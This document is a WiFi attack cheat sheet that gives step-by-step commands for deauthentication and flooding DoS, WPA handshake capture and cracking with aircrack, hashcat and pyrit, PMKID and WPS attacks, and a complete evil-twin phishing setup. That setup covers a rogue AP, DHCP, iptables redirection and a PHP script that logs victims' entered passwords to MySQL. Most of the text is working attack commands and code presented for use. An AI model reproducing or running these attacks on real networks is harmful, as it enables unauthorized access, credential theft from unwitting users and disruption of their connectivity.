Introduction
Setup
sudo airmon-ng check kill
sudo airmon-ng
sudo airmon-ng start wlan0
# Change MAC
ifconfig wlan0mon down
macchanger -s wlan0mon
ifconfig wlan0mon up
To restart network services:
sudo airmon-ng stop wlan1mon
sudo service NetworkManager restart
Start capturing:
# 802.11.g is for 5GHz if you don't have the suitable hardwarte try to use --band ab
sudo airodump-ng -c <CH> --bssid <BSSID> [--band abg] --write <OUT_FILE> <IFACE>
Handshake Capture (Clients needed)
Deauth
Consist on deauthenticate a client in order to capture de re-authentication handshake.
aireplay-ng -0 10 -a <BSSID> -c <CLIENT> <IFACE>
Deauth Global
The same term of deauthentication, but in that case using the brodcast MAC address in order to deauthenticate all clients.
airplay-ng -0 0 -e <ESSID> -c FF:FF:FF:FF:FF:FF <IFACE>
Auth attack or Authentication DoS Mode
Could be sound strange, but if you authenticate 5000 clients to the Access Point is possible to kick out client of the network and then capture their handshake.
airplay-ng -1 0 -e <ESSID> -h 00:a0:8b:cd:02:65 <IFACE> #To authenticate 1 client
mdk3 <IFACE> a -a <BSSID> #Authenticating clients until DoS
Finally the AP will eject the clients with less power rate.
Dissassociation Amok Mode Attack
Same as deauthentication attack but mdk3 gives us the opportunity to introduce allow/deny lists.
blacklist.txt:
a0:e4:b2:45:f6:87
mdk3 <IFACE> d -w blacklist.txt -c 1
Validating the handshake
Sometimes aircrack-ng tells us that it capture a handshake when it hasn’t. So we can validate it with pyrit.
pyrit -r Capture-01.cap analyze
Filtering the capture
When we are trying to capture a handshake, maybe we are capturing a lot of packets, so we just need to filter that. (EAPOL -> Handshakes) (wlan.fc.type_subtype==0x08 are Beacons) (wlan.fc.type\_subtype==0x05 are Probe Response)
tshark -r Capture-01.cap -Y "wlan.fc.type_subtype==0x08 || wlan.fc.type_subtype==0x05 || eapol" -F pcap 2>/dev/null
tshark -r Capture-01.cap -Y "wlan.fc.type_subtype==0x08 || wlan.fc.type_subtype==0x05 || eapol" -w filteredCapture -F pcap 2>/dev/null
pyrit -r filteredCapture analyze
Also it is recommended filtering with the target BSSID.
tshark -r Capture-01.cap -Y "(wlan.fc.type_subtype==0x08 || wlan.fc.type_subtype==0x05 || eapol) && wlan.addr==20:34:fb:b1:c5:53" -w filteredCapture -F pcap 2>/dev/null
IF you want to do a doble analysis you may change -Y parameter to -R "FILTER" -2
tshark -r Capture-01.cap -R "(wlan.fc.type_subtype==0x08 || wlan.fc.type_subtype==0x05 || eapol) && wlan.addr==20:34:fb:b1:c5:53" -2 -w filteredCapture -F pcap 2>/dev/null
Hash extraction
First we need to save our handshaek in HCCAP to after use hccap2john and crack it.
aircrack-ng -J capture Capture-01.cap # For john
hccap2john capture.hccap > handshake.hash
aricrack-ng -j capture Capture-01.cap # For hashcat
Cracking the hanshake
Dictionary Attack
john --wordlist=/usr/share/wordlist/rockyou.txt handshake.hash --format=wpapsk
john --show --format=wpapsk handshake.hash
aircrack-ng -w /usr/share/wordlist/rockyou.txt Capture-01.cap
hashcat -m 2500 -d 1 capture.hccapx /usr/share/wordlists/rockyou.txt --force -w 3
hashcat --show -m 2500 capture.hccapx
Rainbow Table
Airolib + Aircrack
With airolib we can create a dictionary with PMKS.
airolig-ng passwords-airolib --import passwd /usr/share/wordlists/rockyou.txt
echo "<ESSID>" > essid.lst
airolib-ng passwords-airolib --import essid essid.lst
airolib-ng passwords-airolib --stats #Test if all is working correctly
airolib-ng passwords-airolib --clean all #Clean the wordlists to ileggible characters
airolib-ng passwords-airolib --batch #Create the wordlists
Onced created we just need to use aircrack
aircrack-ng -r passwords-airolib_Capture-01.cap
We can see that the speed of cracking of aircrack-ng goes from 10k/s up to 200k/s.
Genpmk + (Cowpatty or Pyrit)
First we need to create a new dictionary.
genpmk -f /usr/share/wordlists/rockyou.txt -d dic.genpmk -s <SSID>
And crackit with Cowpatty:
cowpatty -d dic.genpmk -r Captura-01.cap -s <ESSID> #Up to 360k/s
More faster? try with Pyrit:
pyrit -i dic.genpmk -e <ESSID> -r Captura-01.cap attack_cowpatty #Up to 2M/s
You still want to go faster? Try pyrit with Database:
pyrit -i /usr/share/wordlists/rockyou.txt import_passwords
pyrit -e <ESSID> create_essid
pyrit batch
#Finally attack
pyrit -r Captura-01.cap attack_db #Up to 20M/s
DoS attacks
CTS Frame Attack
The protocol 802.11 is CSMA CA, CA is Collision Avoidance, so in that protocol appear two new types of packets. CTS (Clear to Send) and RTS (Request to Send) that provides to the network the ability to avoid collisions between frames.
What happens if we flood the network with 1000 CTS frames with the time field on his maximum value (30.000 us), if we flood with that TCP stream we will hijack all the bandwidth causing a Denial of Service.
First we need to capture and modify one Clear-to-send frame and modify the Duration to 30.000 us and modify the RA address.
Onced created out evil frame we just need to send several times to the network.
tcpreplay --intf1=<IFACE> --topspeed --loop=10000 evilframe.pcap 2>/dev/null
Actual: 10000 packets (460000 bytes) sent in 3.01 seconds
Rated: 152428.1 Bps, 1.21 Mbps, 3313.65 pps
Statistics for network device: wlx00c0caaba818
Successful packets: 10000
Failed packets: 0
Truncated packets: 0
Retried packets (ENOBUFS): 0
Retried packets (EAGAIN): 0
In that case we busy the channel for:
\[Time Busy = 10.000 packets * 30.000 us = 30s\]Beacon Flood Mode Attack
The beacon frame is a frame that contains information about the access point such as the channel where the AP is working, ciphers, protocols, etc.
These type of beacons are transmitted in plain as other stations and devices need these frames to extract information in order to connect them.
The idea of Beacon Flood Attack such as his name says, flood a large number of beacons in order to create a lot of ESSID in the same Chanel as the target AP in order to make it invisible for users.
# Create a list of AP names:
MyNetwork1
MyNetwork2
MyNetwork3
MyNetwork4
MyNetwork5
MyNetwork6
MyNetwork7
MyNetwork8
MyNetwork9
MyNetwork10
mdk3 <IFACE> b -f networks.txt -a -s 1000 -c <CHANNEL> # -a -> WPA2 -s <speed>
Michael Shutdown Explotation
Can shut down APs using TKIP encryption and QoS Extension with 1 sniffed and 2 injected QoS Data Packets, but less effective.
mdk3 <IFACE> m -t <BSSID>
Evil Twin
One of the most common techniques to obtain the password of a wireless network via phishing. It’s common that the devices emit Probe Request frames when their are not associated to any AP. These Probe Request frame ares packets that contain information about which SSID the device was connected before. So we can abuse of that information in order to create a Fake AP with the same SSID.
thark -i <IFACE> -Y "wlan.fc.type_subtype==4" 2>/dev/null
1 0.000000000 Apple_7d:1f:e9 → Broadcast 802.11 195 Probe Request, SN=1063, FN=0, Flags=........C, SSID=MOVISTAR_PLUS_2A51
2 0.019968349 Apple_7d:1f:e9 → Broadcast 802.11 195 Probe Request, SN=1064, FN=0, Flags=........C, SSID=MOVISTAR_PLUS_2A51
Creating DHCP file
/etc/dhcpd.conf
authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.1.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.1.255;
option routers 192.168.1.129;
option domain-name-servers 8.8.8.8;
range 192.168.1.130 192.168.1.140;
}
Configuring the web page (LOGIN ROUTER WIFI)
Search and copy the html of a login webpage with the following action form:
<tr><td><form action="dbconnect.php" method="post">
And the appropriate dbconnect.php
<?php
session_start();
ob_start();
$host="localhost";
$username="fakeap";
$pass="fakeap";
$dbname="evilTwin";
$tbl_name="sniff";
// Create connection
$conn = mysqli_connect($host, $username, $pass, $dbname);
// Check connection
if (!$conn) {
die("Connection failed: " . mysqli_connect_error());
}
$username=$_POST['username'];
$password=$_POST['password'];
$sql = "INSERT INTO sniff (username, password) VALUES ('$username', '$password')";
if (mysqli_query($conn, $sql)) {
echo "New record created successfully";
} else {
echo "Error: " . $sql . "<br>" . mysqli_error($conn);
}
mysqli_close($conn);
sleep(2);
header("location:upgrading.html");
ob_end_flush();
?>
Initializazing services
We need to start apache2 and mysql
service apache2 start && service mysql start
Configuring MySQL
As we can see in dbconnect.php it’s trying to connect to a evilTwin db with fakeap user, so we just need to configure mysql properly.
Creating the DB
mysql -u root
create database evilTwin;
create table sniff(username varchar(32), password varchar(32));
show tables;
+--------------------+
| Tables_in_evilTwin |
+--------------------+
| wpakeys |
+--------------------+
1 row in set (0.00 sec)
insert into sniff(username, password) values ("TESTKEY", "TESTKEY");
select * from sniff;
+-----------+-----------+
| username | password |
+-----------+-----------+
| TESTKEY | TESTKEY |
+-----------+-----------+
1 row in set (0.00 sec)
Creating a user for the DB
mysql -u root
create user fakeap@localhost identified by 'fakeap';
grant all privileges on evilTwin.* to 'fakeap'@'localhost';
FLUSH PRIVILEGES;
At this point onced we introduced credentials via the web panel, it will be appended in our database.
Creating the AP
With airbase we can set up our fake AP without authentication:
airbase-ng -e <ESSID> -c <CHANNEL> -P <IFACE>
Configuring a new network interface
Onced launched our new fake AP, we need to add a new network interface.
ifconfig at0 192.168.1.129 netmask 255.255.255.128
route add -net 192.168.1.128 netmask 255.255.255.128 gw 192.168.1.129
echo 1 > /proc/sys/net/ipv4/ip_forward
ifconfig at0
at0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.129 netmask 255.255.255.128 broadcast 192.168.1.255
inet6 fe80::e670:b8ff:fed3:935c prefixlen 64 scopeid 0x20<link>
ether e4:70:b8:d3:93:5c txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 57 bytes 8828 (8.6 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Configuring IP tables
The idea is to redirect the traffic coming from victims from at0 to eth0 in order to give them connection to internet.
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination $(hostname -I | awk '{print $1}'):80
iptables -t nat -A POSTROUTING -j MASQUERADE
Syncronize
Finally the last step is syncronize our rules to the fake AP.
dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcp.pid at0
Attacks without Clients
In this section we are not going to capture any type of handshake to obtain the hash or key. We are goin to attack the network in a client-less mode.
PKMID Attack
This attack allows us to break the technology using Pairwise Master Key Identifier (PKMID) which is a characteristic available in a lot of devices.
Via Bettercap
The results will be exported on a pcap file.
bettercap -iface <IFACE>
iface >> wifi.recon on
iface >> wifi.show
iface >> wifi.assoc all
Via hcxdumptool
Same as bettercap, the results will be exported on a pcap file.
hcxdumptool -i <IFACE> -o <OUT_FILE> --enable_status=1
Export results fo hashcat && Cr4ck it!
Using hcxpcaptool we can easily transform the output of bettercap or hcxdumptool to hashcat.
hcxpcaptool -z hashes.hash Capture.pcap
hashcat -m 16800 -d 1 -w 3 hashesh.hash /usr/share/wordslist/rockyou.txt
WPS Attack
Wifi Protected Setup aka WPS is a wireless network security standard that tries to make connections between a router and devices faster and easier.
WPSPinGenerator is an automatic tool available in Wifislax.
First we need to choose the interface to work with and the channels where we want to listen. We can see the generic PINS if they are available on the network by selection the suitable SSID.
Finally we just need to test the PIN and wait for success. Noticed that after 3 fail attempts the WPS could lock.